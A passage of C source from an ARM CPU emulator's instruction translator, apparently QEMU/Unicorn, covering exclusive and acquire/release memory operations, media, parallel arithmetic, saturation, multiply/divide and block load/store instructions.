UNPREDICTABLE cases. */ if (a->rt & 1) { unallocated_encoding(s); return true; } a->rt2 = a->rt + 1; return op_strex(s, a, MO_64, false); } static bool trans_STREXD_t32(DisasContext *s, arg_STREX *a) { return op_strex(s, a, MO_64, false); } static bool trans_STREXB(DisasContext *s, arg_STREX *a) { if (s->thumb ? !ENABLE_ARCH_7 : !ENABLE_ARCH_6K) { return false; } return op_strex(s, a, MO_8, false); } static bool trans_STREXH(DisasContext *s, arg_STREX *a) { if (s->thumb ? !ENABLE_ARCH_7 : !ENABLE_ARCH_6K) { return false; } return op_strex(s, a, MO_16, false); } static bool trans_STLEX(DisasContext *s, arg_STREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_strex(s, a, MO_32, true); } static bool trans_STLEXD_a32(DisasContext *s, arg_STREX *a) { if (!ENABLE_ARCH_8) { return false; } /* We UNDEF for these UNPREDICTABLE cases. */ if (a->rt & 1) { unallocated_encoding(s); return true; } a->rt2 = a->rt + 1; return op_strex(s, a, MO_64, true); } static bool trans_STLEXD_t32(DisasContext *s, arg_STREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_strex(s, a, MO_64, true); } static bool trans_STLEXB(DisasContext *s, arg_STREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_strex(s, a, MO_8, true); } static bool trans_STLEXH(DisasContext *s, arg_STREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_strex(s, a, MO_16, true); } static bool op_stl(DisasContext *s, arg_STL *a, MemOp mop) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr, tmp; if (!ENABLE_ARCH_8) { return false; } /* We UNDEF for these UNPREDICTABLE cases. */ if (a->rn == 15 || a->rt == 15) { unallocated_encoding(s); return true; } addr = load_reg(s, a->rn); tmp = load_reg(s, a->rt); tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); gen_aa32_st_i32(s, tmp, addr, get_mem_index(s), mop | s->be_data); disas_set_da_iss(s, mop, a->rt | ISSIsAcqRel | ISSIsWrite); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, addr); return true; } static bool trans_STL(DisasContext *s, arg_STL *a) { return op_stl(s, a, MO_UL); } static bool trans_STLB(DisasContext *s, arg_STL *a) { return op_stl(s, a, MO_UB); } static bool trans_STLH(DisasContext *s, arg_STL *a) { return op_stl(s, a, MO_UW); } static bool op_ldrex(DisasContext *s, arg_LDREX *a, MemOp mop, bool acq) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr; /* Some cases stopped being UNPREDICTABLE in v8A (but not v8M) */ bool v8a = ENABLE_ARCH_8 && !arm_dc_feature(s, ARM_FEATURE_M); /* We UNDEF for these UNPREDICTABLE cases. 
*/ if (a->rn == 15 || a->rt == 15 || (!v8a && s->thumb && a->rt == 13) || (mop == MO_64 && (a->rt2 == 15 || a->rt == a->rt2 || (!v8a && s->thumb && a->rt2 == 13)))) { unallocated_encoding(s); return true; } addr = tcg_temp_local_new_i32(tcg_ctx); load_reg_var(s, addr, a->rn); tcg_gen_addi_i32(tcg_ctx, addr, addr, a->imm); gen_load_exclusive(s, a->rt, a->rt2, addr, mop); tcg_temp_free_i32(tcg_ctx, addr); if (acq) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); } return true; } static bool trans_LDREX(DisasContext *s, arg_LDREX *a) { if (!ENABLE_ARCH_6) { return false; } return op_ldrex(s, a, MO_32, false); } static bool trans_LDREXD_a32(DisasContext *s, arg_LDREX *a) { if (!ENABLE_ARCH_6K) { return false; } /* We UNDEF for these UNPREDICTABLE cases. */ if (a->rt & 1) { unallocated_encoding(s); return true; } a->rt2 = a->rt + 1; return op_ldrex(s, a, MO_64, false); } static bool trans_LDREXD_t32(DisasContext *s, arg_LDREX *a) { return op_ldrex(s, a, MO_64, false); } static bool trans_LDREXB(DisasContext *s, arg_LDREX *a) { if (s->thumb ? !ENABLE_ARCH_7 : !ENABLE_ARCH_6K) { return false; } return op_ldrex(s, a, MO_8, false); } static bool trans_LDREXH(DisasContext *s, arg_LDREX *a) { if (s->thumb ? !ENABLE_ARCH_7 : !ENABLE_ARCH_6K) { return false; } return op_ldrex(s, a, MO_16, false); } static bool trans_LDAEX(DisasContext *s, arg_LDREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_ldrex(s, a, MO_32, true); } static bool trans_LDAEXD_a32(DisasContext *s, arg_LDREX *a) { if (!ENABLE_ARCH_8) { return false; } /* We UNDEF for these UNPREDICTABLE cases. */ if (a->rt & 1) { unallocated_encoding(s); return true; } a->rt2 = a->rt + 1; return op_ldrex(s, a, MO_64, true); } static bool trans_LDAEXD_t32(DisasContext *s, arg_LDREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_ldrex(s, a, MO_64, true); } static bool trans_LDAEXB(DisasContext *s, arg_LDREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_ldrex(s, a, MO_8, true); } static bool trans_LDAEXH(DisasContext *s, arg_LDREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_ldrex(s, a, MO_16, true); } static bool op_lda(DisasContext *s, arg_LDA *a, MemOp mop) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr, tmp; if (!ENABLE_ARCH_8) { return false; } /* We UNDEF for these UNPREDICTABLE cases. 
*/
    if (a->rn == 15 || a->rt == 15) {
        unallocated_encoding(s);
        return true;
    }

    addr = load_reg(s, a->rn);
    tmp = tcg_temp_new_i32(tcg_ctx);
    gen_aa32_ld_i32(s, tmp, addr, get_mem_index(s), mop | s->be_data);
    disas_set_da_iss(s, mop, a->rt | ISSIsAcqRel);
    tcg_temp_free_i32(tcg_ctx, addr);

    store_reg(s, a->rt, tmp);
    /* Load-acquire: the barrier follows the load (LDAQ, not STRL). */
    tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ);
    return true;
}

static bool trans_LDA(DisasContext *s, arg_LDA *a)
{
    return op_lda(s, a, MO_UL);
}

static bool trans_LDAB(DisasContext *s, arg_LDA *a)
{
    return op_lda(s, a, MO_UB);
}

static bool trans_LDAH(DisasContext *s, arg_LDA *a)
{
    return op_lda(s, a, MO_UW);
}

/*
 * Media instructions
 */

static bool trans_USADA8(DisasContext *s, arg_USADA8 *a)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 t1, t2;

    if (!ENABLE_ARCH_6) {
        return false;
    }

    t1 = load_reg(s, a->rn);
    t2 = load_reg(s, a->rm);
    gen_helper_usad8(tcg_ctx, t1, t1, t2);
    tcg_temp_free_i32(tcg_ctx, t2);
    if (a->ra != 15) {
        t2 = load_reg(s, a->ra);
        tcg_gen_add_i32(tcg_ctx, t1, t1, t2);
        tcg_temp_free_i32(tcg_ctx, t2);
    }
    store_reg(s, a->rd, t1);
    return true;
}

static bool op_bfx(DisasContext *s, arg_UBFX *a, bool u)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 tmp;
    int width = a->widthm1 + 1;
    int shift = a->lsb;

    if (!ENABLE_ARCH_6T2) {
        return false;
    }
    if (shift + width > 32) {
        /* UNPREDICTABLE; we choose to UNDEF */
        unallocated_encoding(s);
        return true;
    }

    tmp = load_reg(s, a->rn);
    if (u) {
        tcg_gen_extract_i32(tcg_ctx, tmp, tmp, shift, width);
    } else {
        tcg_gen_sextract_i32(tcg_ctx, tmp, tmp, shift, width);
    }
    store_reg(s, a->rd, tmp);
    return true;
}

static bool trans_SBFX(DisasContext *s, arg_SBFX *a)
{
    return op_bfx(s, a, false);
}

static bool trans_UBFX(DisasContext *s, arg_UBFX *a)
{
    return op_bfx(s, a, true);
}

static bool trans_BFCI(DisasContext *s, arg_BFCI *a)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 tmp;
    int msb = a->msb, lsb = a->lsb;
    int width;

    if (!ENABLE_ARCH_6T2) {
        return false;
    }
    if (msb < lsb) {
        /* UNPREDICTABLE; we choose to UNDEF */
        unallocated_encoding(s);
        return true;
    }

    width = msb + 1 - lsb;
    if (a->rn == 15) {
        /* BFC */
        tmp = tcg_const_i32(tcg_ctx, 0);
    } else {
        /* BFI */
        tmp = load_reg(s, a->rn);
    }
    if (width != 32) {
        TCGv_i32 tmp2 = load_reg(s, a->rd);
        tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, lsb, width);
        tcg_temp_free_i32(tcg_ctx, tmp2);
    }
    store_reg(s, a->rd, tmp);
    return true;
}

static bool trans_UDF(DisasContext *s, arg_UDF *a)
{
    unallocated_encoding(s);
    return true;
}

/*
 * Parallel addition and subtraction
 */

static bool op_par_addsub(DisasContext *s, arg_rrr *a,
                          void (*gen)(TCGContext *, TCGv_i32, TCGv_i32,
                                      TCGv_i32))
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 t0, t1;

    if (s->thumb
        ? !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP)
        : !ENABLE_ARCH_6) {
        return false;
    }

    t0 = load_reg(s, a->rn);
    t1 = load_reg(s, a->rm);

    gen(tcg_ctx, t0, t0, t1);

    tcg_temp_free_i32(tcg_ctx, t1);
    store_reg(s, a->rd, t0);
    return true;
}

static bool op_par_addsub_ge(DisasContext *s, arg_rrr *a,
                             void (*gen)(TCGContext *, TCGv_i32, TCGv_i32,
                                         TCGv_i32, TCGv_ptr))
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 t0, t1;
    TCGv_ptr ge;

    if (s->thumb ?
!arm_dc_feature(s, ARM_FEATURE_THUMB_DSP) : !ENABLE_ARCH_6) { return false; } t0 = load_reg(s, a->rn); t1 = load_reg(s, a->rm); ge = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, ge, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); gen(tcg_ctx, t0, t0, t1, ge); tcg_temp_free_ptr(tcg_ctx, ge); tcg_temp_free_i32(tcg_ctx, t1); store_reg(s, a->rd, t0); return true; } #define DO_PAR_ADDSUB(NAME, helper) \ static bool trans_##NAME(DisasContext *s, arg_rrr *a) \ { \ return op_par_addsub(s, a, helper); \ } #define DO_PAR_ADDSUB_GE(NAME, helper) \ static bool trans_##NAME(DisasContext *s, arg_rrr *a) \ { \ return op_par_addsub_ge(s, a, helper); \ } DO_PAR_ADDSUB_GE(SADD16, gen_helper_sadd16) DO_PAR_ADDSUB_GE(SASX, gen_helper_saddsubx) DO_PAR_ADDSUB_GE(SSAX, gen_helper_ssubaddx) DO_PAR_ADDSUB_GE(SSUB16, gen_helper_ssub16) DO_PAR_ADDSUB_GE(SADD8, gen_helper_sadd8) DO_PAR_ADDSUB_GE(SSUB8, gen_helper_ssub8) DO_PAR_ADDSUB_GE(UADD16, gen_helper_uadd16) DO_PAR_ADDSUB_GE(UASX, gen_helper_uaddsubx) DO_PAR_ADDSUB_GE(USAX, gen_helper_usubaddx) DO_PAR_ADDSUB_GE(USUB16, gen_helper_usub16) DO_PAR_ADDSUB_GE(UADD8, gen_helper_uadd8) DO_PAR_ADDSUB_GE(USUB8, gen_helper_usub8) DO_PAR_ADDSUB(QADD16, gen_helper_qadd16) DO_PAR_ADDSUB(QASX, gen_helper_qaddsubx) DO_PAR_ADDSUB(QSAX, gen_helper_qsubaddx) DO_PAR_ADDSUB(QSUB16, gen_helper_qsub16) DO_PAR_ADDSUB(QADD8, gen_helper_qadd8) DO_PAR_ADDSUB(QSUB8, gen_helper_qsub8) DO_PAR_ADDSUB(UQADD16, gen_helper_uqadd16) DO_PAR_ADDSUB(UQASX, gen_helper_uqaddsubx) DO_PAR_ADDSUB(UQSAX, gen_helper_uqsubaddx) DO_PAR_ADDSUB(UQSUB16, gen_helper_uqsub16) DO_PAR_ADDSUB(UQADD8, gen_helper_uqadd8) DO_PAR_ADDSUB(UQSUB8, gen_helper_uqsub8) DO_PAR_ADDSUB(SHADD16, gen_helper_shadd16) DO_PAR_ADDSUB(SHASX, gen_helper_shaddsubx) DO_PAR_ADDSUB(SHSAX, gen_helper_shsubaddx) DO_PAR_ADDSUB(SHSUB16, gen_helper_shsub16) DO_PAR_ADDSUB(SHADD8, gen_helper_shadd8) DO_PAR_ADDSUB(SHSUB8, gen_helper_shsub8) DO_PAR_ADDSUB(UHADD16, gen_helper_uhadd16) DO_PAR_ADDSUB(UHASX, gen_helper_uhaddsubx) DO_PAR_ADDSUB(UHSAX, gen_helper_uhsubaddx) DO_PAR_ADDSUB(UHSUB16, gen_helper_uhsub16) DO_PAR_ADDSUB(UHADD8, gen_helper_uhadd8) DO_PAR_ADDSUB(UHSUB8, gen_helper_uhsub8) #undef DO_PAR_ADDSUB #undef DO_PAR_ADDSUB_GE /* * Packing, unpacking, saturation, and reversal */ static bool trans_PKH(DisasContext *s, arg_PKH *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tn, tm; int shift = a->imm; if (s->thumb ? !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP) : !ENABLE_ARCH_6) { return false; } tn = load_reg(s, a->rn); tm = load_reg(s, a->rm); if (a->tb) { /* PKHTB */ if (shift == 0) { shift = 31; } tcg_gen_sari_i32(tcg_ctx, tm, tm, shift); tcg_gen_deposit_i32(tcg_ctx, tn, tn, tm, 0, 16); } else { /* PKHBT */ tcg_gen_shli_i32(tcg_ctx, tm, tm, shift); tcg_gen_deposit_i32(tcg_ctx, tn, tm, tn, 0, 16); } tcg_temp_free_i32(tcg_ctx, tm); store_reg(s, a->rd, tn); return true; } static bool op_sat(DisasContext *s, arg_sat *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_env, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp, satimm; int shift = a->imm; if (!ENABLE_ARCH_6) { return false; } tmp = load_reg(s, a->rn); if (a->sh) { tcg_gen_sari_i32(tcg_ctx, tmp, tmp, shift ? 
shift : 31); } else { tcg_gen_shli_i32(tcg_ctx, tmp, tmp, shift); } satimm = tcg_const_i32(tcg_ctx, a->satimm); gen(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, satimm); tcg_temp_free_i32(tcg_ctx, satimm); store_reg(s, a->rd, tmp); return true; } static bool trans_SSAT(DisasContext *s, arg_sat *a) { return op_sat(s, a, gen_helper_ssat); } static bool trans_USAT(DisasContext *s, arg_sat *a) { return op_sat(s, a, gen_helper_usat); } static bool trans_SSAT16(DisasContext *s, arg_sat *a) { if (s->thumb && !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP)) { return false; } return op_sat(s, a, gen_helper_ssat16); } static bool trans_USAT16(DisasContext *s, arg_sat *a) { if (s->thumb && !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP)) { return false; } return op_sat(s, a, gen_helper_usat16); } static bool op_xta(DisasContext *s, arg_rrr_rot *a, void (*gen_extract)(TCGContext *, TCGv_i32, TCGv_i32), void (*gen_add)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!ENABLE_ARCH_6) { return false; } tmp = load_reg(s, a->rm); /* * TODO: In many cases we could do a shift instead of a rotate. * Combined with a simple extend, that becomes an extract. */ tcg_gen_rotri_i32(tcg_ctx, tmp, tmp, a->rot * 8); gen_extract(tcg_ctx, tmp, tmp); if (a->rn != 15) { TCGv_i32 tmp2 = load_reg(s, a->rn); gen_add(tcg_ctx, tmp, tmp, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); } store_reg(s, a->rd, tmp); return true; } static bool trans_SXTAB(DisasContext *s, arg_rrr_rot *a) { return op_xta(s, a, tcg_gen_ext8s_i32, tcg_gen_add_i32); } static bool trans_SXTAH(DisasContext *s, arg_rrr_rot *a) { return op_xta(s, a, tcg_gen_ext16s_i32, tcg_gen_add_i32); } static bool trans_SXTAB16(DisasContext *s, arg_rrr_rot *a) { if (s->thumb && !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP)) { return false; } return op_xta(s, a, gen_helper_sxtb16, gen_add16); } static bool trans_UXTAB(DisasContext *s, arg_rrr_rot *a) { return op_xta(s, a, tcg_gen_ext8u_i32, tcg_gen_add_i32); } static bool trans_UXTAH(DisasContext *s, arg_rrr_rot *a) { return op_xta(s, a, tcg_gen_ext16u_i32, tcg_gen_add_i32); } static bool trans_UXTAB16(DisasContext *s, arg_rrr_rot *a) { if (s->thumb && !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP)) { return false; } return op_xta(s, a, gen_helper_uxtb16, gen_add16); } static bool trans_SEL(DisasContext *s, arg_rrr *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2, t3; if (s->thumb ? 
!arm_dc_feature(s, ARM_FEATURE_THUMB_DSP) : !ENABLE_ARCH_6) { return false; } t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t3, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); gen_helper_sel_flags(tcg_ctx, t1, t3, t1, t2); tcg_temp_free_i32(tcg_ctx, t3); tcg_temp_free_i32(tcg_ctx, t2); store_reg(s, a->rd, t1); return true; } static bool op_rr(DisasContext *s, arg_rr *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; tmp = load_reg(s, a->rm); gen(tcg_ctx, tmp, tmp); store_reg(s, a->rd, tmp); return true; } static bool trans_REV(DisasContext *s, arg_rr *a) { if (!ENABLE_ARCH_6) { return false; } return op_rr(s, a, tcg_gen_bswap32_i32); } static bool trans_REV16(DisasContext *s, arg_rr *a) { if (!ENABLE_ARCH_6) { return false; } return op_rr(s, a, gen_rev16); } static bool trans_REVSH(DisasContext *s, arg_rr *a) { if (!ENABLE_ARCH_6) { return false; } return op_rr(s, a, gen_revsh); } static bool trans_RBIT(DisasContext *s, arg_rr *a) { if (!ENABLE_ARCH_6T2) { return false; } return op_rr(s, a, gen_helper_rbit); } /* * Signed multiply, signed and unsigned divide */ static bool op_smlad(DisasContext *s, arg_rrrr *a, bool m_swap, bool sub) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2; if (!ENABLE_ARCH_6) { return false; } t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); if (m_swap) { gen_swap_half(tcg_ctx, t2); } gen_smul_dual(tcg_ctx, t1, t2); if (sub) { /* This subtraction cannot overflow. */ tcg_gen_sub_i32(tcg_ctx, t1, t1, t2); } else { /* * This addition cannot overflow 32 bits; however it may * overflow considered as a signed operation, in which case * we must set the Q flag. */ gen_helper_add_setq(tcg_ctx, t1, tcg_ctx->cpu_env, t1, t2); } tcg_temp_free_i32(tcg_ctx, t2); if (a->ra != 15) { t2 = load_reg(s, a->ra); gen_helper_add_setq(tcg_ctx, t1, tcg_ctx->cpu_env, t1, t2); tcg_temp_free_i32(tcg_ctx, t2); } store_reg(s, a->rd, t1); return true; } static bool trans_SMLAD(DisasContext *s, arg_rrrr *a) { return op_smlad(s, a, false, false); } static bool trans_SMLADX(DisasContext *s, arg_rrrr *a) { return op_smlad(s, a, true, false); } static bool trans_SMLSD(DisasContext *s, arg_rrrr *a) { return op_smlad(s, a, false, true); } static bool trans_SMLSDX(DisasContext *s, arg_rrrr *a) { return op_smlad(s, a, true, true); } static bool op_smlald(DisasContext *s, arg_rrrr *a, bool m_swap, bool sub) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2; TCGv_i64 l1, l2; if (!ENABLE_ARCH_6) { return false; } t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); if (m_swap) { gen_swap_half(tcg_ctx, t2); } gen_smul_dual(tcg_ctx, t1, t2); l1 = tcg_temp_new_i64(tcg_ctx); l2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, l1, t1); tcg_gen_ext_i32_i64(tcg_ctx, l2, t2); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); if (sub) { tcg_gen_sub_i64(tcg_ctx, l1, l1, l2); } else { tcg_gen_add_i64(tcg_ctx, l1, l1, l2); } tcg_temp_free_i64(tcg_ctx, l2); gen_addq(s, l1, a->ra, a->rd); gen_storeq_reg(s, a->ra, a->rd, l1); tcg_temp_free_i64(tcg_ctx, l1); return true; } static bool trans_SMLALD(DisasContext *s, arg_rrrr *a) { return op_smlald(s, a, false, false); } static bool trans_SMLALDX(DisasContext *s, arg_rrrr *a) { return op_smlald(s, a, true, false); } static bool trans_SMLSLD(DisasContext *s, arg_rrrr *a) { return op_smlald(s, a, false, true); } static bool trans_SMLSLDX(DisasContext *s, arg_rrrr *a) { return op_smlald(s, a, true, true); } static bool 
op_smmla(DisasContext *s, arg_rrrr *a, bool round, bool sub)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 t1, t2;

    if (s->thumb
        ? !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP)
        : !ENABLE_ARCH_6) {
        return false;
    }

    t1 = load_reg(s, a->rn);
    t2 = load_reg(s, a->rm);
    tcg_gen_muls2_i32(tcg_ctx, t2, t1, t1, t2);

    if (a->ra != 15) {
        TCGv_i32 t3 = load_reg(s, a->ra);
        if (sub) {
            /*
             * For SMMLS, we need a 64-bit subtract: it supplies the
             * borrow caused by a non-zero multiplicand lowpart, and the
             * correct result lowpart for rounding.
             */
            TCGv_i32 zero = tcg_const_i32(tcg_ctx, 0);
            tcg_gen_sub2_i32(tcg_ctx, t2, t1, zero, t3, t2, t1);
            tcg_temp_free_i32(tcg_ctx, zero);
        } else {
            tcg_gen_add_i32(tcg_ctx, t1, t1, t3);
        }
        tcg_temp_free_i32(tcg_ctx, t3);
    }
    if (round) {
        /*
         * Adding 0x80000000 to the 64-bit quantity means that we get a
         * carry into the high word when the low word has the msb set.
         */
        tcg_gen_shri_i32(tcg_ctx, t2, t2, 31);
        tcg_gen_add_i32(tcg_ctx, t1, t1, t2);
    }
    tcg_temp_free_i32(tcg_ctx, t2);
    store_reg(s, a->rd, t1);
    return true;
}

static bool trans_SMMLA(DisasContext *s, arg_rrrr *a)
{
    return op_smmla(s, a, false, false);
}

static bool trans_SMMLAR(DisasContext *s, arg_rrrr *a)
{
    return op_smmla(s, a, true, false);
}

static bool trans_SMMLS(DisasContext *s, arg_rrrr *a)
{
    return op_smmla(s, a, false, true);
}

static bool trans_SMMLSR(DisasContext *s, arg_rrrr *a)
{
    return op_smmla(s, a, true, true);
}

static bool op_div(DisasContext *s, arg_rrr *a, bool u)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 t1, t2;

    if (s->thumb
        ? !dc_isar_feature(aa32_thumb_div, s)
        : !dc_isar_feature(aa32_arm_div, s)) {
        return false;
    }

    t1 = load_reg(s, a->rn);
    t2 = load_reg(s, a->rm);
    if (u) {
        gen_helper_udiv(tcg_ctx, t1, t1, t2);
    } else {
        gen_helper_sdiv(tcg_ctx, t1, t1, t2);
    }
    tcg_temp_free_i32(tcg_ctx, t2);
    store_reg(s, a->rd, t1);
    return true;
}

static bool trans_SDIV(DisasContext *s, arg_rrr *a)
{
    return op_div(s, a, false);
}

static bool trans_UDIV(DisasContext *s, arg_rrr *a)
{
    return op_div(s, a, true);
}

/*
 * Block data transfer
 */

static TCGv_i32 op_addr_block_pre(DisasContext *s, arg_ldst_block *a, int n)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 addr = load_reg(s, a->rn);

    if (a->b) {
        if (a->i) {
            /* pre increment */
            tcg_gen_addi_i32(tcg_ctx, addr, addr, 4);
        } else {
            /* pre decrement */
            tcg_gen_addi_i32(tcg_ctx, addr, addr, -(n * 4));
        }
    } else if (!a->i && n != 1) {
        /* post decrement */
        tcg_gen_addi_i32(tcg_ctx, addr, addr, -((n - 1) * 4));
    }

    if (s->v8m_stackcheck && a->rn == 13 && a->w) {
        /*
         * If the writeback is incrementing SP rather than
         * decrementing it, and the initial SP is below the
         * stack limit but the final written-back SP would
         * be above, then we must not perform any memory
         * accesses, but it is IMPDEF whether we generate
         * an exception.  We choose to do so in this case.
         * At this point 'addr' is the lowest address, so
         * either the original SP (if incrementing) or our
         * final SP (if decrementing), so that's what we check.
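 * (Example: "stmdb sp!, {r0-r3}" moves SP down by 16; 'addr' here is
 * then the final SP, and the check fires if it is below the limit.)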
*/ gen_helper_v8m_stackcheck(tcg_ctx, tcg_ctx->cpu_env, addr); } return addr; } static void op_addr_block_post(DisasContext *s, arg_ldst_block *a, TCGv_i32 addr, int n) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->w) { /* write back */ if (!a->b) { if (a->i) { /* post increment */ tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); } else { /* post decrement */ tcg_gen_addi_i32(tcg_ctx, addr, addr, -(n * 4)); } } else if (!a->i && n != 1) { /* pre decrement */ tcg_gen_addi_i32(tcg_ctx, addr, addr, -((n - 1) * 4)); } store_reg(s, a->rn, addr); } else { tcg_temp_free_i32(tcg_ctx, addr); } } static bool op_stm(DisasContext *s, arg_ldst_block *a, int min_n) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int i, j, n, list, mem_idx; bool user = a->u; TCGv_i32 addr, tmp, tmp2; if (user) { /* STM (user) */ if (IS_USER(s)) { /* Only usable in supervisor mode. */ unallocated_encoding(s); return true; } } list = a->list; n = ctpop16(list); if (n < min_n || a->rn == 15) { unallocated_encoding(s); return true; } addr = op_addr_block_pre(s, a, n); mem_idx = get_mem_index(s); for (i = j = 0; i < 16; i++) { if (!(list & (1 << i))) { continue; } if (user && i != 15) { tmp = tcg_temp_new_i32(tcg_ctx); tmp2 = tcg_const_i32(tcg_ctx, i); gen_helper_get_user_reg(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); } else { tmp = load_reg(s, i); } gen_aa32_st32(s, tmp, addr, mem_idx); tcg_temp_free_i32(tcg_ctx, tmp); /* No need to add after the last transfer. */ if (++j != n) { tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); } } op_addr_block_post(s, a, addr, n); return true; } static bool trans_STM(DisasContext *s, arg_ldst_block *a) { /* BitCount(list) < 1 is UNPREDICTABLE */ return op_stm(s, a, 1); } static bool trans_STM_t32(DisasContext *s, arg_ldst_block *a) { /* Writeback register in register list is UNPREDICTABLE for T32. */ if (a->w && (a->list & (1 << a->rn))) { unallocated_encoding(s); return true; } /* BitCount(list) < 2 is UNPREDICTABLE */ return op_stm(s, a, 2); } static bool do_ldm(DisasContext *s, arg_ldst_block *a, int min_n) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int i, j, n, list, mem_idx; bool loaded_base; bool user = a->u; bool exc_return = false; TCGv_i32 addr, tmp, tmp2, loaded_var; if (user) { /* LDM (user), LDM (exception return) */ if (IS_USER(s)) { /* Only usable in supervisor mode. */ unallocated_encoding(s); return true; } if (extract32(a->list, 15, 1)) { exc_return = true; user = false; } else { /* LDM (user) does not allow writeback. */ if (a->w) { unallocated_encoding(s); return true; } } } list = a->list; n = ctpop16(list); if (n < min_n || a->rn == 15) { unallocated_encoding(s); return true; } addr = op_addr_block_pre(s, a, n); mem_idx = get_mem_index(s); loaded_base = false; loaded_var = NULL; for (i = j = 0; i < 16; i++) { if (!(list & (1 << i))) { continue; } tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld32u(s, tmp, addr, mem_idx); if (user) { tmp2 = tcg_const_i32(tcg_ctx, i); gen_helper_set_user_reg(tcg_ctx, tcg_ctx->cpu_env, tmp2, tmp); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); } else if (i == a->rn) { loaded_var = tmp; loaded_base = true; } else if (i == 15 && exc_return) { store_pc_exc_ret(s, tmp); } else { store_reg_from_load(s, i, tmp); } /* No need to add after the last transfer. */ if (++j != n) { tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); } } op_addr_block_post(s, a, addr, n); if (loaded_base) { /* Note that we reject base == pc above. */ store_reg(s, a->rn, loaded_var); } if (exc_return) { /* Restore CPSR from SPSR. 
*/ tmp = load_cpu_field(tcg_ctx, spsr); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { // gen_io_start(tcg_ctx); } gen_helper_cpsr_write_eret(tcg_ctx, tcg_ctx->cpu_env, tmp); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { // gen_io_end(tcg_ctx); } tcg_temp_free_i32(tcg_ctx, tmp); /* Must exit loop to check un-masked IRQs */ s->base.is_jmp = DISAS_EXIT; } return true; } static bool trans_LDM_a32(DisasContext *s, arg_ldst_block *a) { /* * Writeback register in register list is UNPREDICTABLE * for ArchVersion() >= 7. Prior to v7, A32 would write * an UNKNOWN value to the base register. */ if (ENABLE_ARCH_7 && a->w && (a->list & (1 << a->rn))) { unallocated_encoding(s); return true; } /* BitCount(list) < 1 is UNPREDICTABLE */ return do_ldm(s, a, 1); } static bool trans_LDM_t32(DisasContext *s, arg_ldst_block *a) { /* Writeback register in register list is UNPREDICTABLE for T32. */ if (a->w && (a->list & (1 << a->rn))) { unallocated_encoding(s); return true; } /* BitCount(list) < 2 is UNPREDICTABLE */ return do_ldm(s, a, 2); } static bool trans_LDM_t16(DisasContext *s, arg_ldst_block *a) { /* Writeback is conditional on the base register not being loaded. */ a->w = !(a->list & (1 << a->rn)); /* BitCount(list) < 1 is UNPREDICTABLE */ return do_ldm(s, a, 1); } /* * Branch, branch with link */ static bool 